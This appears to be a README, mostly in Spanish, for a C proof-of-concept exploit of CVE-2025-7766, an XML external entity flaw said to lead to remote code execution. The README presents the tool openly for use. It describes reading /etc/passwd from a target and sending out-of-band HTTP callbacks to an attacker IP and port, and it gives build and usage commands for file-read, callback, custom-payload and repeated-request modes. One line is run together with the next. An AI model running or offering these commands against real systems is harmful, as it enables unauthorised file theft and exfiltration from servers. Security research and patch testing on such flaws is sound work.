
Exploit PoC basado en C para CVE-2025-7766 que demuestra XXE a RCE mediante lectura de archivos y devoluciones de llamada HTTP fuera de banda. Soporta cargas útiles XML personalizadas y solicitudes repetidas.
PoC para explotar la vulnerabilidad de entidad externa XML en CVE-2025-7766. Demuestra lectura de archivos (/etc/passwd) y callbacks HTTP fuera de banda.
Autor: Byte Reaper
CVE: CVE-2025-7766
Vulnerabilidad: Ejecución remota de código a través de entidad externa XML (XXE)
/etc/passwd desde el objetivo.gcc -o exploit exploit.c argparse.c -lcurl
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT
# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r
# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'
# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5
# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
MIT